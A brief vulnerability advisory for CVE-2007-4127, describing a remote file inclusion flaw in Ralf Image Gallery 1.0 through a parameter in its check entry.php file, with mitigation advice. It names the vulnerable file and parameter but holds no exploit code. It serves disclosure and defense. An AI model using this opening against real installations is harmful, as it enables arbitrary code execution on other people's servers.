CVE-2007-4127

Name of the Vulnerable Software and Affected Versions Ralf Image Gallery (RIG) version 1.0

Description A remote file inclusion issue exists, allowing remote attackers to execute arbitrary PHP code via a URL in the dir abs src parameter in the check entry.php file. However, it is reported that the product exits if register globals is enabled, potentially blocking exploitation.

Recommendations For Ralf Image Gallery (RIG) version 1.0, consider disabling the check entry.php file or restricting access to it until a fix is available. Additionally, ensure that register globals is disabled to prevent potential exploitation.